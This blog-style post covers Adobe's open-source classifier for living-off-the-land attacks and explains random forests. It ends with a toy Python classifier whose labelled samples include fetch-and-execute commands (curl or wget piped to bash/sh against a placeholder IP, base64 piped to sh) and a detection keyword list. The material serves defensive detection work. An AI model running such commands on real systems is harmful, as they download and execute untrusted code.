A supervised learning approach to Living off the Land attack classification from Adobe SI

First, a relevant quote from a preeminent author in the realm of intelligence analysis, Richards J. Heuer’s Psychology of Intelligence Analysis, required reading.

“When inferring the causes of behavior, too much weight is accorded to personal qualities and dispositions of the actor and not enough to situational determinants of the actor’s behavior.”

The security intelligence team from Adobe’s Security Coordination Center (SCC) have sought to apply deeper analysis of situational determinants per adversary behaviors as they pertain to living-off-the-land (LotL) techniques. While we, as security analysts, are party to adversary and actor group qualities and dispositions, the use of LotL techniques (situational determinants) proffers challenges for us. As the authors indicate, “bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years…LotL is still one of the preferred approaches even for highly skilled attackers.”

Given that classic LotL detection is rife with false positives, Adobe’s SI team used open source and representative incident data to develop a dynamic and high-confidence LotL Classifier, and open-sourced it.

Please treat their Medium post, Living off the Land (LotL) Classifier Open-Source Project, and the related GitHub repo as mandatory reading before proceeding here. I’ll not repeat what they’ve quite capably already documented. Their LotL Classifier includes two components: feature extraction and an ML classifier algorithm. Again, read their post on these components, but I do want to focus a bit on their use of the random forest classifier for this project. As LotL Classifier is written in Python, the project utilizes the random forest classifier class from scikit-learn, simple and efficient tools for predictive data analysis and machine learning in Python. Caie, Dimitriou and Arandjelovic (2021), in their contribution to the book Artificial Intelligence and Deep Learning in Pathology, state that random forest classifiers fall under the broad umbrella of ensemble-based learning methods, are simple to implement, fast in operation, and successful in a variety of domains. The random forest approach constructs many “simple” decision trees during the training stage and takes the majority vote (mode) across them in the classification stage (Caie et al., 2021). Of particular benefit, this voting strategy corrects for the undesirable tendency of individual decision trees to overfit training data (Caie et al., 2021). Cotaie, Boros, Vikramjeet, and Malik, the Living off the Land Classifier authors, found that, though they used a variety of different classifiers during testing, their best results in terms of accuracy and speed were achieved using the RandomForest classifier. This was driven in large part by their use of test data representative of “real world” situations during the training stage. The authors include with LotL Classifier two datasets: bash_huge.known (Linux) and cmd_huge.known (Windows).
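The two stages described above (feature extraction, then many simple trees trained on bootstrap resamples and a majority vote at classification time), as an added pure-Python example that is not the LotL Classifier's code and does not use scikit-learn. The command lines, the keyword list and the four features are constructed assumptions for illustration, and each "tree" is a single-split stump rather than a full decision tree.

```python
import random
import re
from collections import Counter

# Constructed, labelled command lines (1 = suspicious, 0 = benign). The samples, the
# keyword list and the four features are illustrative assumptions, not the LotL
# Classifier's own datasets or feature extraction.
SAMPLES = [
    ("ls -la /var/log", 0), ("cat /etc/hostname", 0), ("df -h", 0),
    ("grep -i error app.log | tail -n 20", 0), ("tar czf backup.tgz /home/user/docs", 0),
    ("systemctl status nginx", 0),
    ("echo aGVsbG8gd29ybGQ= | base64 -d | sh", 1), ("curl -s http://203.0.113.9/s.sh | bash", 1),
    ("wget -q -O- http://203.0.113.9/p | sh", 1), ("python3 -c 'import socket,os' 203.0.113.9", 1),
]
KEYWORDS = ("base64", "curl", "wget", "| sh", "| bash", "-c ")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def features(cmd):
    """Feature extraction: length, pipe count, keyword hits, IPv4 literals."""
    return [len(cmd), cmd.count("|"), sum(k in cmd for k in KEYWORDS), len(IPV4.findall(cmd))]

def train_stump(rows, rng):
    """One 'simple' tree: a single split on a randomly chosen feature. Returns
    (feature, threshold, label_above); the opposite label is predicted below."""
    f = rng.randrange(len(rows[0][0]))
    best = None
    for thr in sorted({x[f] for x, _ in rows}):
        for above in (0, 1):  # which label to assign when feature > threshold
            err = sum(y != (above if x[f] > thr else 1 - above) for x, y in rows)
            if best is None or err < best[0]:
                best = (err, f, thr, above)
    return best[1:]

def train_forest(samples, n_trees=25, seed=7):
    """Training stage: each stump learns from its own bootstrap resample."""
    rng = random.Random(seed)
    rows = [(features(c), y) for c, y in samples]
    forest = []
    for _ in range(n_trees):
        boot = [rng.choice(rows) for _ in rows]  # resample with replacement
        forest.append(train_stump(boot, rng))
    return forest

def predict(forest, cmd):
    """Classification stage: every stump votes; the mode of the votes wins."""
    x = features(cmd)
    votes = [above if x[f] > thr else 1 - above for f, thr, above in forest]
    return Counter(votes).most_common(1)[0][0]

FOREST = train_forest(SAMPLES)
```

Because each stump sees a different resample and a random feature, no single over-fitted split dominates; the vote smooths them out, which is the overfitting correction the text attributes to the ensemble.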